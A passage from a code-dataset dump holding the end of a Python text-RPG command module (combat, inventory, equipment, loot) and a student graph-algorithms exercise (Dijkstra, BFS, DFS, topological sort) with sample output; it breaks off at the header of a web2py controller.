{item}\")\n i += 1\n print(f\"{p_gold} Gold\")\n name = input(\"Item Name: >> \")\n if name in inventory:\n if name in items[\"Weapons\"] and name in inventory:\n wName = items[\"Weapons\"][name][\"Name\"]\n wDamage = items[\"Weapons\"][name][\"Damage\"]\n wPrice = items[\"Weapons\"][name][\"Price\"]\n\n print(f\"Name: {wName}\\nDamage: {wDamage}\\nPrice: {wPrice}\")\n elif name in items[\"Shields\"] and name in inventory:\n sName = items[\"Shields\"][name][\"Name\"]\n sDefense = items[\"Shields\"][name][\"Defense\"]\n sPrice = items[\"Shields\"][name][\"Price\"]\n\n print(f\"Name: {sName}\\nDefense: {sDefense}\\nPrice: {sPrice}\")\n elif name in items[\"Armors\"] and name in inventory:\n aName = items[\"Armors\"][name][\"Name\"]\n aDefense = items[\"Armors\"][name][\"Defense\"]\n aPrice = items[\"Armors\"][name][\"Price\"]\n\n print(f\"Name: {aName}\\nDefense: {aDefense}\\nPrice: {aPrice}\")\n\n else:\n return\n else:\n return\n\n\n# Check available skills\ndef check_skill():\n i = 0\n for skill in p_skills:\n print(f\"{i}. {skill}\")\n i += 1\n skill = input(\"Skill Name: >> \")\n\n if skill in p_skills and skill in skills:\n skill_mult = skills[skill][\"Damage_Multiplier\"]\n skill_cost = skills[skill][\"Stamina_Cost\"]\n print(f\"Skill: {skill}\\nDamage Multiplier: {skill_mult}\\nStamina Cost: {skill_cost}\")\n else:\n print(\"Skill not learned, or exists\")\n\n\n# Show stats\ndef check_stats():\n combined_defense = p_defense + p_eqADefenseNum[0] + p_eqSDefenseNum[0]\n\n print(f\"Player EXP: {p_exp} | Level: {p_level}\")\n print(f\"Player Max Health: {p_health_max}HP ({p_vitality * 2.5}HP from Vitality)\")\n print(f\"Player Health: {p_health_current}HP\")\n print(f\"Damage: {p_eqWPowerNum[0]} ({p_eqWeapon[0]})\")\n print(f\"Strength: {p_strength} STR\")\n print(f\"Vitality: {p_vitality} VIT\")\n print(f\"Stamina: {p_stamina} STA\")\n print(f\"Defense: {combined_defense} DEF ({p_eqArmor[0]} + {p_eqADefenseNum[0]} | {p_eqShield[0]} + {p_eqSDefenseNum[0]} | Base + {p_defense})\")\n print(f\"Critical Multiplier: {p_critmulti}x\")\n\n\n# Roll the dice for BATTLES\ndef rtd():\n global p_health_current\n global en_hp\n dice1 = random.randint(1, 6)\n dice2 = random.randint(1, 6)\n self_flagellation = random.randint(2, 5)\n combined_str = dice1 + dice2 + (p_strength * 0.5) + p_eqWPowerNum[0]\n flag_combined = (p_eqWPowerNum[0] + p_strength) / self_flagellation\n print(dice1, dice2)\n if dice1 == 1 or dice2 == 1:\n if dice1 == 1 and dice2 == 1:\n print(\"Aw snap! 
Weak Hands\")\n print(f\"You hurt yourself for {flag_combined} points of Damage\")\n print(\"\")\n p_health_current -= flag_combined\n return p_health_current\n else:\n print(f\"Your attack has missed the {en_name[0]}\")\n print(\"\")\n elif dice1 == dice2:\n print(\"Critical Hit!\")\n print(f\"You hit {en_name[0]} for {combined_str*p_critmulti} points of Damage\")\n print(\"\")\n en_hp[0] -= combined_str*p_critmulti\n else:\n print(f\"You hit for {combined_str} points of Damage\")\n print(\"\")\n en_hp[0] -= combined_str\n\n\ndef en_rtd():\n global p_health_current\n global en_str, en_sta\n dice1 = random.randint(1, 6)\n dice2 = random.randint(1, 6)\n skill_dice = random.randint(1, 12)\n self_flagellation = (dice1 + dice2 + (en_str[0] * 0.5)) / 2\n enemy_dmg = (dice1 + dice2 + en_str[0]) - p_totalDefense\n reduced_dmg = (dice1 + dice2 + en_str[0]) - p_totalDefense\n print(f\"Enemy has RTD'd {dice1} and {dice2}!\")\n if dice1 == 1 or dice2 == 1:\n if dice1 == 1 and dice2 == 1:\n print(f\"The {en_name[0]} is confused and hit itself for {self_flagellation}\")\n print(\"\")\n en_hp[0] -= self_flagellation\n return en_hp\n else:\n print(f\"{en_name[0]} has missed it's attack!\")\n print(\"\")\n elif dice1 == dice2:\n if reduced_dmg <= 0:\n print(f\"{en_name[0]} has Criticaly Hit you for 0 points of damage! (reduced by {p_totalDefense})\")\n print(\"\")\n p_health_current -= 0\n else:\n print(f\"{en_name[0]} has Criticaly Hit you for {reduced_dmg*1.6} points of damage! (reduced by {p_totalDefense})\")\n print(\"\")\n p_health_current -= reduced_dmg * 1.6\n return p_health_current\n else:\n if reduced_dmg <= 0:\n print(f\"{en_name[0]} hits you for 0 points of damage! (reduced by {p_totalDefense})\")\n print(\"\")\n p_health_current -= 0\n else:\n print(f\"{en_name[0]} hits you for {reduced_dmg} points of damage! (reduced by {p_totalDefense})\")\n print(\"\")\n p_health_current -= enemy_dmg\n return p_health_current\n\n\n# Use available skill\ndef use_skill():\n global p_stamina\n global p_stamina_max\n dice1 = random.randint(1, 6)\n dice2 = random.randint(1, 6)\n i = 0\n sta_cost = []\n skill_damage = []\n for skill in p_skills:\n skill_cost = skills[skill][\"Stamina_Cost\"]\n sk_damage = skills[skill][\"STR_Multiplier\"]\n print(f\"{i}. 
{skill} - Costs {skill_cost} STA per use\")\n sta_cost.append(skill_cost)\n skill_damage.append(sk_damage)\n i += 1\n print(f\"You have {p_stamina} / {p_stamina_max} Stamina\")\n\n try:\n try:\n use = int(input(\"Which skill you want to use?: >> \"))\n print(use)\n if p_skills[use] in p_skills:\n dmg_cnt = (dice1 + dice2 + p_eqWPowerNum[0] + (p_strength * 0.5)) * skill_damage[use]\n if p_stamina < sta_cost[use]:\n print(\"Not enough Stamina!\")\n print(\"\")\n use_skill()\n else:\n print(f\"Using {p_skills[use]} for {sta_cost[use]} Stamina point/s!\")\n print(f\"{p_skills[use]} dealt {dmg_cnt} points of damage to {en_name[0]}\")\n print(\"\")\n en_hp[0] -= dmg_cnt\n p_stamina -= sta_cost[use]\n return en_hp[0], p_stamina\n except ValueError:\n print(\"No such Skill in your Skill List!\")\n print(\"\")\n use_skill()\n except IndexError:\n print(\"No such Skill in your Skill List!\")\n print(\"\")\n use_skill()\n\n\ndef use_item():\n global p_health_current\n global p_stamina\n global p_eqWPowerNum\n global consumables_quant\n print(\"\")\n i = 0\n q_items = []\n hp_restore = []\n sta_restore = []\n dmg_mult = []\n desc = []\n for item in consumables:\n hp_restore.append(items[\"Consumables\"][item][\"HP_Restore\"])\n sta_restore.append(items[\"Consumables\"][item][\"STA_Restore\"])\n dmg_mult.append(items[\"Consumables\"][item][\"Damage_Multiplier\"])\n desc.append(items[\"Consumables\"][item][\"Desc\"])\n quant = consumables_quant[item][\"quant\"]\n print(f\"{i}. {item} {quant}x - {desc[0]}\")\n q_items.append(quant)\n i += 1\n\n print(\"\")\n use = int(input(\"Which item you want to use? >> \"))\n if consumables[use] in consumables:\n p_health_current += hp_restore[use]\n p_stamina += sta_restore[use]\n p_eqWPowerNum[0] += (p_eqWPowerNum[0] / 100) * 0.25\n hp_restore.clear()\n sta_restore.clear()\n dmg_mult.clear()\n desc.clear()\n consumables.pop(use)\n\n print(\"\")\n return p_health_current, p_stamina, p_eqWPowerNum, consumables_quant\n else:\n hp_restore.clear()\n sta_restore.clear()\n dmg_mult.clear()\n desc.clear()\n print(f\"Such item does not exist in your inventory\")\n\n\n\n print(\"\")\n\n# Equip item from inventory\ndef equip():\n select = int(input(\"Weapon[1], Armor[2], Shield[3]: >> \"))\n print(\"\")\n eq_me = []\n i = 0\n if select == 1:\n for item in items[\"Weapons\"]:\n if item in inventory:\n eq_me.append(item)\n inventory.pop()\n\n for item in eq_me:\n print(f\"{i}. {item}\")\n i += 1\n try:\n equip = input(\"Choose number of item to equip: >> \")\n print(\"\")\n eq_int = int(equip)\n equip_name = eq_me[eq_int]\n if equip_name in eq_me:\n p_eqWeapon.pop()\n p_eqWeapon.append(equip_name)\n p_eqWPowerNum.pop()\n p_eqWPower = items[\"Weapons\"][p_eqWeapon[0]][\"Damage\"]\n p_eqWPowerNum.append(p_eqWPower)\n for item in eq_me:\n inventory.append(item)\n print(f\"You equipped {eq_me[eq_int]}\")\n print(\"\")\n eq_me.clear()\n else:\n print(\"No such weapon with that name\")\n print(\"\")\n except IndexError:\n print(\"No such weapon with that name!\")\n print(\"\")\n\n if select == 2:\n for item in items[\"Armors\"]:\n if item in inventory:\n eq_me.append(item)\n\n for item in eq_me:\n print(f\"{i}. 
{item}\")\n i += 1\n try:\n equip = input(\"Choose number of item to equip: >> \")\n print(\"\")\n eq_int = int(equip)\n equip_name = eq_me[eq_int]\n if equip_name in eq_me:\n p_eqArmor.pop()\n p_eqArmor.append(equip_name)\n p_eqADefenseNum.pop()\n p_eqADefense = items[\"Armors\"][p_eqArmor[0]][\"Defense\"]\n p_eqADefenseNum.append(p_eqADefense)\n print(f\"You equipped {eq_me[eq_int]} with {p_eqADefenseNum[0]} defense\")\n print(\"\")\n return p_eqADefense\n else:\n print(\"No such armor with that name!\")\n print(\"\")\n except IndexError:\n print(\"No such armor with that name!\")\n print(\"\")\n\n if select == 3:\n for item in items[\"Shields\"]:\n if item in inventory:\n eq_me.append(item)\n\n for item in eq_me:\n print(f\"{i}. {item}\")\n i += 1\n try:\n equip = input(\"Choose number of item to equip: >> \")\n print(\"\")\n eq_int = int(equip)\n equip_name = eq_me[eq_int]\n if equip_name in eq_me:\n p_eqShield.pop()\n p_eqShield.append(equip_name)\n p_eqSDefenseNum.pop()\n p_eqSDefense = items[\"Shields\"][p_eqShield[0]][\"Defense\"]\n p_eqSDefenseNum.append(p_eqSDefense)\n print(f\"You equipped {eq_me[eq_int]}\")\n print(\"\")\n eq_me.clear()\n else:\n print(\"No such shield with that name!\")\n print(\"\")\n except IndexError:\n print(\"No such shield with that name!\")\n print(\"\")\n\n\n# DELETE LVLUP FUNC LATER\ndef lvlup():\n global p_strength, p_level, p_health_max, p_defense, p_stamina_max, p_vitality, p_health_current, p_stamina\n p_level += 1\n p_strength += 2\n p_health_max += 5\n p_defense += 1\n p_stamina_max += 1\n p_stamina = p_stamina_max\n p_vitality += 3\n p_health_current = p_health_max\n return p_strength, p_level, p_health_max, p_defense, p_stamina, p_vitality, p_health_current, p_stamina\n\n\n# Show Equipped items\ndef show():\n print(f\"{p_eqWeapon[0]} - Damage {p_eqWPowerNum}\")\n print(f\"{p_eqArmor[0]} - Defense {p_eqADefenseNum}\")\n print(f\"{p_eqShield[0]} - Defense {p_eqSDefenseNum}\")\n\n\n# Sell from inventory\ndef sell():\n global inventory\n global p_gold\n global p_health_current\n global p_eqWeapon\n i = 0\n sell_me = []\n price = []\n temp_inv = []\n try:\n try:\n for item in items[\"Weapons\"]:\n\n if item in inventory:\n\n sell_me.append(item)\n sell_price = items[\"Weapons\"][item][\"Price\"]\n sell_name = items[\"Weapons\"][item][\"Name\"]\n price.append(sell_price)\n temp_inv.append(item)\n print(f\"{i}. {item} - {sell_price}\")\n i += 1\n\n for item in items[\"Armors\"]:\n\n if item in inventory:\n\n sell_me.append(item)\n sell_price = items[\"Armors\"][item][\"Price\"]\n price.append(sell_price)\n temp_inv.append(item)\n print(f\"{i}. {item} - {sell_price}\")\n i += 1\n\n for item in items[\"Shields\"]:\n\n if item in inventory:\n\n sell_me.append(item)\n sell_price = items[\"Shields\"][item][\"Price\"]\n price.append(sell_price)\n temp_inv.append(item)\n print(f\"{i}. {item} - {sell_price}\")\n i += 1\n\n sell = int(input(\"Which item you want to sell? >> \"))\n p_gold += price[sell]\n print(f\"Sold {sell_me[sell]} for {price[sell]}\")\n temp_inv.pop(sell)\n inventory.clear()\n\n for x in temp_inv:\n inventory.append(x)\n\n return inventory, p_gold\n except ValueError:\n print(\"I don't speak gibberish!\")\n except IndexError:\n print(\"Trying to scam me ya fool?!\")\n print(\"*HEAVY PUNCH*\")\n heavy_punch = random.randint(5, 20)\n p_health_current -= heavy_punch\n print(f\"You've taken {heavy_punch} points of damage!\")\n\n\n# Showcase of commands\ndef info():\n i = 0\n for cmd in comms:\n print(f\"{i}. 
{cmd}\")\n i += 1\n\n\n# Simple About\ndef about():\n print('''\n pyRPG v0.2\n Programmed by Yannick\n ''')\n\n\ndef target():\n try:\n print(f\"Your target is {p_target[0]} ({rarity_perc[0]}%)\")\n print()\n except IndexError:\n print(\"You have no target\")\n\n\ndef battle():\n global p_health_current\n global p_exp, p_stamina\n generate = 1\n\n if generate == 1:\n generate_enemy()\n generate -= 1\n enemy_hp = monsters[en_rarity[0]][p_target[0]][\"HP\"]\n enemy_str = monsters[en_rarity[0]][p_target[0]][\"STR\"]\n #print(f\"{p_health_current} / {p_health_max} HP, {p_stamina} / {p_stamina_max} STA\")\n #print(f\"Enemy HP {enemy_hp}, STR {enemy_str}\")\n #print(f\"Awards {true_exp} EXPs\")\n # BATTLE ITSELF\n while en_hp[0] >= 1 or p_health_current >= 1:\n\n if p_health_current > p_health_max:\n p_health_current = p_health_max\n if p_stamina > p_stamina_max:\n p_stamina = p_stamina_max\n if p_health_current > p_health_max and p_stamina > p_stamina_max:\n p_health_current = p_health_max\n p_stamina = p_stamina_max\n\n print(\"======\")\n print(f\"Enemy: {en_name[0]}\")\n print(f\"HP: {en_hp[0]} | STR: {en_str[0]}\")\n print(\"======\")\n print(f\"HP: {p_health_current} / {p_health_max} | STA: {p_stamina} / {p_stamina_max}\")\n print(f\"{btl_comms}\")\n\n btl_console = input(f\"What will you do to {en_name[0]}? >> \")\n if btl_console == \"rtd\":\n rtd()\n if en_hp[0] <= 0:\n print(f\"Enemy {en_name[0]} has perished!\")\n print(f\"You have gained {en_exp[0]} points of Experience!\")\n print(\"\")\n p_exp += en_exp[0]\n p_stamina = p_stamina_max\n randomloot()\n return p_exp, p_stamina\n else:\n en_rtd()\n elif btl_console == \"uskill\":\n use_skill()\n if en_hp[0] <= 0:\n print(f\"Enemy {en_name[0]} has perished!\")\n print(f\"You have gained {en_exp[0]} points of Experience!\")\n p_exp += en_exp[0]\n p_stamina = p_stamina_max\n randomloot()\n return p_exp, p_stamina\n else:\n en_rtd()\n elif btl_console == \"escape\":\n p_health_current = p_health_current / 100\n p_stamina = p_stamina_max\n return print(f\"You escaped like a fool! 
{p_health_current}\"), p_stamina\n elif btl_console == \"uitem\":\n use_item()\n\n if en_hp[0] <= 0:\n print(f\"Enemy {en_name[0]} has perished!\")\n print(f\"You have gained {en_exp[0]} points of Experience!\")\n p_exp += en_exp[0]\n p_stamina = p_stamina_max\n randomloot()\n elif p_health_current <= 0:\n print(f\"You have died, because your HP has reached {p_health_current}!\")\n p_stamina = p_stamina_max\n p_health_current = (p_health_max / 100) * 25\n return p_health_current, p_stamina\n\n target()\n return\n\n\ndef generate_enemy():\n global p_target\n global en_name ,en_hp, en_str, en_exp, en_rarity, rarity_perc\n global true_exp\n rarity = random.randint(0, 100)\n en_name.clear()\n en_hp.clear()\n en_str.clear()\n en_exp.clear()\n en_rarity.clear()\n rarity_perc.clear()\n p_target.clear()\n print(f\"Rarity level {100 - rarity}%\")\n rarity_perc.append(rarity)\n if rarity <= 40:\n enem = random.choice(commons_list)\n en_name.append(monsters[\"Common\"][enem][\"Name\"])\n en_hp.append(monsters[\"Common\"][enem][\"HP\"])\n en_str.append(monsters[\"Common\"][enem][\"STR\"])\n en_exp.append(monsters[\"Common\"][enem][\"EXP\"])\n true_exp = en_exp[0] * (rarity / 100)\n print(f\"Your enemy is Common {enem}\")\n print(f\"Stats: {en_hp[0]} HP, {en_str[0]} STR\")\n p_target.append(enem)\n en_rarity.append(\"Common\")\n return p_target, en_rarity, true_exp, rarity_perc\n\n elif rarity <= 60:\n enem = random.choice(uncommons_list)\n en_name.append(monsters[\"Uncommon\"][enem][\"Name\"])\n en_hp.append(monsters[\"Uncommon\"][enem][\"HP\"])\n en_str.append(monsters[\"Uncommon\"][enem][\"STR\"])\n en_exp.append(monsters[\"Uncommon\"][enem][\"EXP\"])\n true_exp = en_exp[0] * (rarity / 100)\n print(f\"Your enemy is Uncommon {enem}\")\n print(f\"Stats: {en_hp[0]} HP, {en_str[0]} STR\")\n p_target.append(enem)\n en_rarity.append(\"Uncommon\")\n return p_target, en_rarity, true_exp\n\n elif rarity <= 75:\n enem = random.choice(rares_list)\n en_name.append(monsters[\"Rare\"][enem][\"Name\"])\n en_hp.append(monsters[\"Rare\"][enem][\"HP\"])\n en_str.append(monsters[\"Rare\"][enem][\"STR\"])\n en_exp.append(monsters[\"Rare\"][enem][\"EXP\"])\n true_exp = en_exp[0] * (rarity / 100)\n print(f\"Your enemy is Rare {enem}\")\n print(f\"Stats: {en_hp[0]} HP, {en_str[0]} STR\")\n p_target.append(enem)\n en_rarity.append(\"Rare\")\n return p_target, en_rarity, true_exp\n\n elif rarity <= 99:\n enem = random.choice(elites_list)\n en_name.append(monsters[\"Elite\"][enem][\"Name\"])\n en_hp.append(monsters[\"Elite\"][enem][\"HP\"])\n en_str.append(monsters[\"Elite\"][enem][\"STR\"])\n en_exp.append(monsters[\"Elite\"][enem][\"EXP\"])\n true_exp = en_exp[0] * (rarity / 100)\n print(f\"Your enemy is Elite {enem}\")\n print(f\"Stats: {en_hp} HP, {en_str} STR\")\n p_target.append(enem)\n en_rarity.append(\"Elite\")\n return p_target, en_rarity, true_exp\n\n elif rarity == 100:\n enem = random.choice(legendaries_list)\n en_name.append(monsters[\"Legendary\"][enem][\"Name\"])\n en_hp.append(monsters[\"Legendary\"][enem][\"HP\"])\n en_str.append(monsters[\"Legendary\"][enem][\"STR\"])\n en_exp.append(monsters[\"Legendary\"][enem][\"EXP\"])\n true_exp = en_exp[0] * (rarity / 100)\n print(f\"Your enemy is Legendary {enem}\")\n print(f\"Stats: {en_hp[0]} HP, {en_str[0]} STR\")\n print(\"======\")\n p_target.append(enem)\n en_rarity.append(\"Legendary\")\n return p_target, en_rarity, true_exp\n\n else:\n print(\"UNEXPECTED ERROR/S\")\n\n# Add random loot to inventory\ndef randomloot():\n global inventory\n\n for x in range(0, 
6, 2):\r\n        loot = random.choice(item_loot_list)\r\n\r\n        if loot in inventory:\r\n            print(f\"{loot} already in inventory, you leave {loot} forgotten behind!\")\r\n        elif loot in consumables:\r\n            consumables.append(loot)\r\n            print(f\"{loot} added to your Pouch!\")\r\n        else:\r\n            inventory.append(loot)\r\n            print(f\"Item {loot} was added to your Inventory!\")\r\n\r\n","repo_name":"r1xvu0/pyRPG","sub_path":"commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":21922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"}
+{"seq_id":"41957903549","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport dsf\r\nimport graph_AL\r\nimport min_heap\r\nimport math\r\n\r\ndef random_graph(nv,ne,weighted=False, directed = False,seed=-1):\r\n    if seed>=0:\r\n        np.random.seed(seed)\r\n    G=graph_AL.Graph(nv,weighted=weighted, directed = directed)\r\n    edges = set()\r\n    ne = min(ne,nv*(nv-1)//2)\r\n    while len(edges) < ne:\r\n        source = np.random.randint(nv)\r\n        dest = (np.random.randint(1,nv)+source)%nv\r\n        if (source,dest) not in edges and (dest,source) not in edges:\r\n            edges.add((source,dest))\r\n    if weighted:\r\n        w = np.random.permutation(ne) + 1\r\n    else:\r\n        w = np.ones(ne,dtype=np.int32)\r\n    for i, edge in enumerate(edges):\r\n        G.insert_edge(edge[0],edge[1],w[i])\r\n    return G\r\n\r\ndef dijkstra(G,source=0):\r\n    visited = set()\r\n    dist = [math.inf for v in G.AL]\r\n    prev = [-1 for v in G.AL]\r\n    dist[source] = 0\r\n    H = min_heap.min_heap()\r\n    H.insert(min_heap.heap_record(0,source))\r\n    # NOTE: the body of this loop was lost in extraction; it is reconstructed\r\n    # here as standard Dijkstra.  The min_heap record fields and extract_min\r\n    # call are assumed from the heap_record(0, source) insertion above.\r\n    while len(H.heap)>0 and len(visited)<len(G.AL):\r\n        rec = H.extract_min()\r\n        v = rec.data\r\n        if v not in visited:\r\n            visited.add(v)\r\n            for edge in G.AL[v]:\r\n                if dist[v] + edge.weight < dist[edge.dest]:\r\n                    dist[edge.dest] = dist[v] + edge.weight\r\n                    prev[edge.dest] = v\r\n                    H.insert(min_heap.heap_record(dist[edge.dest],edge.dest))\r\n    return prev, dist\r\n\r\ndef connected(G,u,v):\r\n    # Reconstructed (original lost in extraction): u and v are connected iff\r\n    # they land in the same disjoint-set component; the dsf helper API is\r\n    # assumed from the import above.\r\n    S = dsf.DSF(len(G.AL))\r\n    for vert in range(len(G.AL)):\r\n        for edge in G.AL[vert]:\r\n            S.union(vert,edge.dest)\r\n    return S.find(u) == S.find(v)\r\n\r\ndef in_degrees(G):\r\n    # Reconstructed helper used by make_ts: incoming-edge count per vertex\r\n    in_deg = [0 for v in G.AL]\r\n    for vert in range(len(G.AL)):\r\n        for edge in G.AL[vert]:\r\n            in_deg[edge.dest] += 1\r\n    return in_deg\r\n\r\ndef breadth_first_search_order(G,source=0):\r\n    # T(V,E) = O(|V|*|E|)\r\n    visited_list = [source]\r\n    Q = [source]\r\n    while len(Q)>0:\r\n        for edge in G.AL[Q.pop(0)]:\r\n            if edge.dest not in visited_list:\r\n                visited_list.append(edge.dest)\r\n                Q.append(edge.dest)\r\n    return visited_list\r\n\r\ndef depth_first_search_order(G,source=0,visited=None,prev=None,visited_list=None):\r\n    # T(V,E) = O(|V|*|E|)\r\n    if visited==None:\r\n        visited = set()\r\n        prev = [-1 for i in range(len(G.AL))]\r\n        visited_list=[source]\r\n        visited.add(source)\r\n    for edge in G.AL[source]:\r\n        if edge.dest not in visited:\r\n            prev[edge.dest] = source\r\n            visited.add(edge.dest)  # mark before recursing, or cycles recurse forever\r\n            visited_list.append(edge.dest)\r\n            depth_first_search_order(G,edge.dest,visited,prev,visited_list)\r\n    return visited_list\r\n\r\ndef make_ts(G):\r\n    # Kahn's algorithm.  T(V,E) = O(|V|+|E|)\r\n    # NOTE: the sample output below was produced by a variant that also\r\n    # deletes cycle-breaking edges; this corrected version simply returns\r\n    # None when a cycle remains.\r\n    in_deg = np.array(in_degrees(G))\r\n    ts = []\r\n    Q = [i for i in range(len(in_deg)) if in_deg[i]==0]\r\n    while len(Q) != 0:\r\n        v = Q.pop(0)\r\n        ts.append(v)\r\n        for edge in G.AL[v]:\r\n            u = edge.dest\r\n            in_deg[u] -= 1\r\n            if in_deg[u] == 0:\r\n                Q.append(u)  # Q is a plain list; the original called Q.enqueue(edge)\r\n    if len(ts) == len(G.AL):  # every vertex was output, so G had no cycle\r\n        return ts\r\n    return None\r\n\r\ndef find_dist(G,prev,u):\r\n    # T(V,E) = O(|V|*|E|)\r\n    # Walk the prev[] chain from u back to the source, summing edge weights.\r\n    source,dest = prev[u],u\r\n    dist = 0\r\n    while source != -1:\r\n        for edge in G.AL[source]:\r\n            if edge.dest == dest:\r\n                dist = dist + edge.weight\r\n                dest = source\r\n                source = prev[dest]\r\n                break  # source/dest were just updated; stop scanning this list\r\n    return dist\r\n\r\nif __name__ == \"__main__\":\r\n    plt.close(\"all\")\r\n\r\n    print('\nQuestion 1')\r\n    v_n, e_n = 8, 5\r\n    np.random.seed(0)\r\n    G1 = random_graph(v_n, e_n)\r\n    G1.display('G1')\r\n    G1.draw('G1')\r\n    for u in range(v_n):\r\n        for v in range(u+1, v_n):\r\n            print('connected(G1,{},{}) = {}'.format(u,v,connected(G1,u,v)))\r\n\r\n    print('\nQuestion 2')\r\n    for i in range(1):\r\n        v_n, e_n = 7,12\r\n        np.random.seed(i)\r\n        G2 = random_graph(v_n, e_n,directed=True)\r\n        G2.draw('G2')\r\n        G2.display('G2')\r\n        for source in range(v_n):\r\n            visited_list = breadth_first_search_order(G2,source)\r\n            print('source =',source, 'breadth-first search order', visited_list)\r\n\r\n    print('\nQuestion 3')\r\n    
for i in range(1):\r\n v_n, e_n = 7,12\r\n np.random.seed(i)\r\n G3 = random_graph(v_n, e_n,directed=True)\r\n G3.draw('G3')\r\n G3.display('G3')\r\n for source in range(v_n):\r\n visited_list = depth_first_search_order(G3,source)\r\n print('source =',source, 'depth-first search order', visited_list)\r\n\r\n print('\\nQuestion 4')\r\n for i in range(1):\r\n v_n, e_n = 7,11\r\n np.random.seed(i)\r\n G4 = random_graph(v_n, e_n,directed=True)\r\n G4.draw('G4')\r\n G4.display('G4')\r\n s = make_ts(G4)\r\n print('Topological sort:',s)\r\n G4.draw('G4 after removing edges (if necessary)')\r\n G4.display('G4 after removing edges (if necessary)')\r\n\r\n print('\\nQuestion 5')\r\n for i in range(1):\r\n np.random.seed(i)\r\n G5 = random_graph(7,12,directed=True,weighted=True)\r\n G5.display('G5')\r\n G5.draw('G5')\r\n prev,dist = dijkstra(G5)\r\n print('Results:')\r\n print('prev = ',prev)\r\n print('dist = ',dist)\r\n print('Distances')\r\n for v in range(len(G5.AL)):\r\n print(v,find_dist(G5,prev,v))\r\n\r\n'''\r\nQuestion 1\r\nG1 representation\r\ndirected: False, weighted: False\r\nAdjacency list:\r\nAL[0]=[(4,1)]\r\nAL[1]=[(7,1), (3,1)]\r\nAL[2]=[(4,1)]\r\nAL[3]=[(1,1), (7,1)]\r\nAL[4]=[(0,1), (2,1)]\r\nAL[5]=[]\r\nAL[6]=[]\r\nAL[7]=[(1,1), (3,1)]\r\nconnected(G1,0,1) = False\r\nconnected(G1,0,2) = True\r\nconnected(G1,0,3) = False\r\nconnected(G1,0,4) = True\r\nconnected(G1,0,5) = False\r\nconnected(G1,0,6) = False\r\nconnected(G1,0,7) = False\r\nconnected(G1,1,2) = False\r\nconnected(G1,1,3) = True\r\nconnected(G1,1,4) = False\r\nconnected(G1,1,5) = False\r\nconnected(G1,1,6) = False\r\nconnected(G1,1,7) = True\r\nconnected(G1,2,3) = False\r\nconnected(G1,2,4) = True\r\nconnected(G1,2,5) = False\r\nconnected(G1,2,6) = False\r\nconnected(G1,2,7) = False\r\nconnected(G1,3,4) = False\r\nconnected(G1,3,5) = False\r\nconnected(G1,3,6) = False\r\nconnected(G1,3,7) = True\r\nconnected(G1,4,5) = False\r\nconnected(G1,4,6) = False\r\nconnected(G1,4,7) = False\r\nconnected(G1,5,6) = False\r\nconnected(G1,5,7) = False\r\nconnected(G1,6,7) = False\r\n\r\nQuestion 2\r\nG2 representation\r\ndirected: True, weighted: False\r\nAdjacency list:\r\nAL[0]=[(2,1), (5,1), (4,1)]\r\nAL[1]=[(5,1), (0,1)]\r\nAL[2]=[(4,1)]\r\nAL[3]=[(0,1)]\r\nAL[4]=[(5,1), (3,1), (1,1)]\r\nAL[5]=[(6,1)]\r\nAL[6]=[(0,1)]\r\nsource = 0 breadth-first search order [0, 2, 5, 4, 6, 3, 1]\r\nsource = 1 breadth-first search order [1, 5, 0, 6, 2, 4, 3]\r\nsource = 2 breadth-first search order [2, 4, 5, 3, 1, 6, 0]\r\nsource = 3 breadth-first search order [3, 0, 2, 5, 4, 6, 1]\r\nsource = 4 breadth-first search order [4, 5, 3, 1, 6, 0, 2]\r\nsource = 5 breadth-first search order [5, 6, 0, 2, 4, 3, 1]\r\nsource = 6 breadth-first search order [6, 0, 2, 5, 4, 3, 1]\r\n\r\nQuestion 3\r\nG3 representation\r\ndirected: True, weighted: False\r\nAdjacency list:\r\nAL[0]=[(2,1), (5,1), (4,1)]\r\nAL[1]=[(5,1), (0,1)]\r\nAL[2]=[(4,1)]\r\nAL[3]=[(0,1)]\r\nAL[4]=[(5,1), (3,1), (1,1)]\r\nAL[5]=[(6,1)]\r\nAL[6]=[(0,1)]\r\nsource = 0 depth-first search order [0, 2, 4, 5, 6, 3, 1]\r\nsource = 1 depth-first search order [1, 5, 6, 0, 2, 4, 3]\r\nsource = 2 depth-first search order [2, 4, 5, 6, 0, 3, 1]\r\nsource = 3 depth-first search order [3, 0, 2, 4, 5, 6, 1]\r\nsource = 4 depth-first search order [4, 5, 6, 0, 2, 3, 1]\r\nsource = 5 depth-first search order [5, 6, 0, 2, 4, 3, 1]\r\nsource = 6 depth-first search order [6, 0, 2, 4, 5, 3, 1]\r\n\r\nQuestion 4\r\nG4 representation\r\ndirected: True, weighted: False\r\nAdjacency list:\r\nAL[0]=[(2,1), (5,1), 
(4,1)]\r\nAL[1]=[(5,1), (0,1)]\r\nAL[2]=[(4,1)]\r\nAL[3]=[(0,1)]\r\nAL[4]=[(5,1), (3,1), (1,1)]\r\nAL[5]=[]\r\nAL[6]=[(0,1)]\r\ndeleting edge (4,1)\r\ndeleting edge (3,0)\r\nTopological sort: [6, 1, 0, 2, 4, 5, 3]\r\nG4 after removing edges (if necessary) representation\r\ndirected: True, weighted: False\r\nAdjacency list:\r\nAL[0]=[(2,1), (5,1), (4,1)]\r\nAL[1]=[(5,1), (0,1)]\r\nAL[2]=[(4,1)]\r\nAL[3]=[]\r\nAL[4]=[(5,1), (3,1)]\r\nAL[5]=[]\r\nAL[6]=[(0,1)]\r\n\r\nQuestion 5\r\nG5 representation\r\ndirected: True, weighted: True\r\nAdjacency list:\r\nAL[0]=[(2,1), (5,6), (4,2)]\r\nAL[1]=[(5,8), (0,9)]\r\nAL[2]=[(4,3)]\r\nAL[3]=[(0,5)]\r\nAL[4]=[(5,10), (3,11), (1,4)]\r\nAL[5]=[(6,12)]\r\nAL[6]=[(0,7)]\r\nResults:\r\nprev = [-1, 4, 0, 4, 0, 0, 5]\r\ndist = [0, 6, 1, 13, 2, 6, 18]\r\nDistances\r\n0 0\r\n1 6\r\n2 1\r\n3 13\r\n4 2\r\n5 6\r\n6 18\r\n'''\r\n","repo_name":"jamesb5959/CS2402","sub_path":"graph_algorithms_exercise2_start.py","file_name":"graph_algorithms_exercise2_start.py","file_ext":"py","file_size_in_byte":8645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"25090691698","text":"# -*- coding: utf-8 -*-\n# this file is released under public domain and you can use without limitations\n\n# ----------------------------------------------------------------------------------------------------------------------\n# this is the main 